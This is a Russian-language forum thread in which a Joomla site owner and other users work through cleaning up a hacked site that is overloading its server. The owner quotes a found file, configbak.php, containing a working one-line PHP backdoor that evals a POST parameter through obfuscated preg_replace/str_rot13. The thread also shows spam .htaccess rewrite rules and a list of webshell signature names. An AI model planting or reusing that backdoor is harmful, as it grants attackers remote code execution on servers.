Сайт превышает нагрузку! 3400 VS 300. Указанную папку найти не могу

  • 24 Ответов
  • 1127 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Всем привет! Уже который день подряд видимо кто-то ломит мой сайт.
Нагрузки превышают уже все возможные варианты! 3400 против 300 возможных.
Хостер шлет письма с указанием процесса [/r/article/1143527453385345901/c22cc6d97fe94dba17032c0c3e38]
Но ни папку, ни файл ничего не могу найти. Кто-нибудь сталкивался с этой проблемой?
Проверяла айболитом - нашли вредоносные скрипты в com_rsfirewall/sql/sqlazure/signatures.data.sql
  • 1…ll ekin0x variant'),('kacak','filename','PHP Shell - c99shell kacak variant'),(' liz0zim','filename','PHP Shell - c99shell liz0zim variant'),('r57shell','regex'

Удалила... Так после этого нагрузка к вечеру показала 3400 против 300.
За день до моих поисков и "лечения" 740 против 300.

Помогите! Что делать?!

В .htaccess сейчас:
Код
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+([0-9]+).*[0-9]+_.*%[0-9]+%[0-9]+P([0-9]+)[0-9]+.*H(.*).*ZXZ.*([0-9]+).*X[0-9]+([^\d\/]+)PU[0-9]+R.*MV[0-9]+.*O.*[0-9]+%[0-9]+([^\d\/]+)%[0-9]+%[0-9]+%[0-9]+%[0-9]+([^\d\/]+).*%[0-9]+%[0-9]+%[0-9]+([0-9]+)%[0-9]+([0-9]+)-%[0-9]+%[0-9]+([^\d\/]+)$ ?$25$24=$6&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/[0-9]+\/[0-9]+\/[0-9]+\/[0-9]+_.*_.*\/[0-9]+-[0-9]+-.*-G([^\d\/]+)\/[0-9]+_.*_.*_.*_[0-9]+..*$ ?$5$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)\/([0-9]+)\/([0-9]+)$ ?$1$2=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)\/E.*X.*\/([0-9]+)\/S.*N.*E.*\/([0-9]+)$ ?$1$4=$8&%{QUERY_STRING}[L]
« Последнее редактирование: 18.05.2016, 03:27:58 от xxx87 »

Цитировать
Что делать?!
Сажать на длительный карантин. Основная идея — запретить всё, что можно, изменить права, "отлучив" сервер от владения файлами, чтобы он не смог их изменять. Необходимо создать такую рабочую среду, в которой будут невозможны любые несанкционированные действия в файловой системе (обязательно не забудьте про open_basedir — иначе "конец" всей системе). Далее по логам ошибок вычислять шеллы.

Кстати, давно обновлялись? Какая версия Joomla?
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Сажать на длительный карантин. Основная идея — запретить всё, что можно, изменить права, "отлучив" сервер от владения файлами, чтобы он не смог их изменять. Необходимо создать такую рабочую среду, в которой будут невозможны любые несанкционированные действия в файловой системе (обязательно не забудьте про open_basedir — иначе "конец" всей системе). Далее по логам ошибок вычислять шеллы.

Кстати, давно обновлялись? Какая версия Joomla?
Joomla 3.5.0
Сейчас нашла в корне sitemap.xml весом 4.4 Мб вот с такими данными       
Код
<url>
<loc>http://мойсайт.ru/red/5977/36</loc>
<lastmod>2016-05-11</lastmod>
<changefreq>daily</changefreq>
<priority>0.8</priority>
</url>
Те я так понимаю вот это и грузит процц?!
Логи ошибок - это в папке администр? Там в конце часто фигурируют - [11-May-2016 15:41:19 Europe/Moscow] PHP Warning:  Creating default object from empty value in /libraries/joomla/updater/adapters/extension.php on line 61
и
[05-Apr-2016 12:39:10 Europe/Moscow] PHP Strict Standards:  Declaration of JFormRulePwebGoogleAC::test() should be compatible with JFormRule::test(SimpleXMLElement $element, $value, $group = NULL, Joomla\Registry\Registry $input = NULL, JForm $form = NULL) in /modules/mod_pwebcontact/form/rules/pwebgoogleac.php on line 53


Не заметил, версия актуальная.
Но лучше обновиться до 3.5.1 — заодно "перезальёте" все файлы CMS.
А Sitemap тут ни при чём.
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Не заметил, версия актуальная.
Но лучше обновиться до 3.5.1 — заодно "перезальёте" все файлы CMS.
А Sitemap тут ни при чём.
Извините, а open_basedir это же в .ini А я его сразу удалила. А на .htaccess  поставила 444 права - правильно все?! Просто совсем плохо разбираюсь во всем этом пока :(((((((
а вот и чудо находка в index
Спойлер
[свернуть]
« Последнее редактирование: 18.05.2016, 04:08:25 от xxx87 »

На виртуальном хостинге вы не имеете доступа к php.ini, описанные мной вещи в моём первом сообщении в рамках виртуального хостинга сделать не получится. Сайт нужно переносить на VDS (найдите самый дешёвый за 500 руб. в месяц). Всё дело в том, что серверу доступны файлы всегда, независимо от того, какие права установлены. Даже если вы поставите 000, то шелл всё равно сможет манипулировать файлами. Тут необходим совсем иной подход.
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг

*

draff

  • *******
  • 2739
  • [+]174 / [-]5
  • step by step
.htaccess заменить на стандартный с архива ДЖумла . Наверно уже и поисковики проиндексировали весь хлам с сайта.
Айболит должен был найти и файлы со скриптом, как в indrx.php. Включите параноидальный режим сканера айболит и проверьте. Или поиск в файлах по кускам кода, в редакторе Notepad++

*

Taatshi

Я бы на Вашем месте заказала платную чистку. Судя по Вашему общению на форуме, не обижайтесь, но сами Вы не справитесь как мне кажется. Нужно неплохо знать код Joomla и структуру папок и файлов чтоб полностью вычистить сайт. Одного айболита может и не хватить.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3  /  ОТЗЫВЫ 
Минимальная ставка за платные услуги 1000 рэ Связь: telegram - Taatshi, почта - Taatshi на яндексе.

*

wishlight

  • ********
  • 3582
  • [+]221 / [-]1
  • skype aqaus.com
Однозначно изолировать сайт от других если есть и проверить его ai-bolit хотя бы.

Эта штука не виновата.
com_rsfirewall/sql/sqlazure/signatures.data.sql

Хотя возможно происки хостера  и конкурентов.

*

SDKiller

  • ******
  • 2734
  • [+]325 / [-]5
  • ...ergo sum
.htaccess заменить на стандартный с архива ДЖумла

+1

com_rsfirewall/sql/sqlazure/signatures.data.sql

Вы всего лишь нашли сигнатуры (образцы фрагментов кода) вредоносных скриптов в установочном sql-файле com_rsfirewall
Думаю вы бы получили аналогичный результат если бы "айболитом" проверили файлы самого айболита.

...Тут необходим совсем иной подход.

Что за бред в целом?

Цитировать
...обязательно не забудьте про open_basedir — иначе "конец" всей системе...
...Сайт нужно переносить на VDS...
...серверу доступны файлы всегда, независимо от того, какие права установлены...

Какой системе конец?

Если она сидит на шареде с единственным сайтом - то open_basedir - забота хостера.
У вменяемого хостера ничего не выйдет за пределы её аккаунта и без open_basedir. А скрипты будут исполняться от пользователя её аккаунта.

И зачем ей vds? Учиться админить?
Или по опыту работы с шаредом просто тупо взять предоставленные данные и развернуть сайт из-под рута?

Цитировать
Что за бред в целом?
Куку! Бред в целом — это замена .htaccess на новый и смена прав на шареде, т.к. это ничего не изменит. Поэтому здесь нужен совсем иной подход, нежели смена прав. Здесь ещё нужно сменить владельца пула PHP, что невозможно сделать на шареде.

Цитировать
И зачем ей vds?
см. выше.

Цитировать
open_basedir - забота хостера.
Если автор вдруг захочет чему-то научиться (или же захочет научиться кто-нибудь другой, читающий эту тему), то я уже дал один готовый хороший совет, чем неплохо?
« Последнее редактирование: 18.05.2016, 15:01:09 от Филипп Сорокин »
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг


*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Чистила я чистила и тьфу тьфу вроде все вычистила. Судя по логам ломали через  плагин либо катпродакт для вирт или второй ( не помню как он называется - его аналог ), да и еще одно для коммуникации ( была старая версия ). Обновила все что можно и заменила  все файлы из свежей Joomla. js файлы залила из квикстарта шаблона как и большинство файлов. Обновила rsfirewall, произвела настройки ( но основательно проверю и проведу настройки чуть позже как только Касперыч закончит проверку тотальную моего ноута ). Закрыла доступ к админке паролем.
Теперича думаю на чем все же строить магаз на VirtueMart или на ДШ. Страшно уже что вирт так ломят.
Кстати есть файлы, которые по версии rsfirewall были модифицированны и он предлагает загрузить оригиналы. Что думаете? тк эти файлы я заливала все же с официального дистрибутива. Не пойму на что он ругается.
Сижу и не знаю верить ли своему счастью или это затишье перед бурей.
Кстати вчера после всех манипуляций - нагрузка пришла в норму :))))))))

*

ChaosHead

Резервную копию сделайте, чтобы не пришлось потом чистить всё заново, если вычистили вдруг не всё

Есть хорошая программа для Windows WinMerge — с помощью неё можно произвести сравнение файлов в указанных каталогах. Очень помогает при борьбе с вирусами. Сравнивать нужно с чистым дистрибутивом.
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
ChaosHead и Филипп Сорокин спасибо за советы!

*

winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
Я бы посоветовал на недельку поставить какой нить хорошенький снифер запросов, если что нить осталось, то там отследите, плюс также не плохо было бы, если что то отловити, взять ctime-неделя-месяц, и посмотреть изминения.... ну и конечно же профилактические меры безопасности по настройки сервера...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Опять пошла нагрузка. Начала шерстить рут файлы и обнаружила вот эту прелесть.
 .clamavconnector.scan
Код
public_html/сайт2/tmp/sfx.php=Win.Trojan.Hide-1
Только сейчас увидела возможность поиска по файлам по части кода в редакторе - занимаюсь. Тк  нагрузка идет от
 [/red/5974/13925] тоже самое что было в карте сайта
Сайт2 я уже благополучно снесла перед чисткой

*

winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
Опять пошла нагрузка. Начала шерстить рут файлы и обнаружила вот эту прелесть.
 .clamavconnector.scan
Код
public_html/сайт2/tmp/sfx.php=Win.Trojan.Hide-1
Только сейчас увидела возможность поиска по файлам по части кода в редакторе - занимаюсь. Тк  нагрузка идет от
 [/red/5974/13925] тоже самое что было в карте сайта
Сайт2 я уже благополучно снесла перед чисткой
Там случайно "good day" не было написано?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Цитата: winstrool
Там случайно "good day" не было написано?
Вроде бы нет. У меня вообще файлы какие то странные присутствуют в руте. Я к хостеру - пишу проверьте системные ли они - они говорят - если не пользуетесь - удаляйте.
.clamavconnector.scan это же вред файл, я правильно понимаю?!
Вот эти файлы меня очень смущают:
configbak.php
Код
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['kt7uvf']) && ($www= $_POST['kt7uvf']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
.pearrc
И все это началось после того как меня ломанули турки - Hacked by Kabss
« Последнее редактирование: 21.05.2016, 02:49:01 от xxx87 »

*

winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
файлом может быть хоть abracadabra.her.ego.znaet
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
файлом может быть хоть abracadabra.her.ego.znaet
Как Вы считаете я все эти файлы могу удалить? Тк я все переживаю что системное что нить удалю

*

winstrool

  • *****
  • 758
  • [+]41 / [-]2
  • Свободен для работы
сделайте бекапы и экспериментируйте, что не так, востановите с бекапов....
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

xxx87

  • ***
  • 130
  • [+]4 / [-]0
  • прошу любить и жаловать
Зараза еще сидела в root папке tmp
Вычистила все теперича :)

Проверьте также каталоги cache, images, media, logs
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг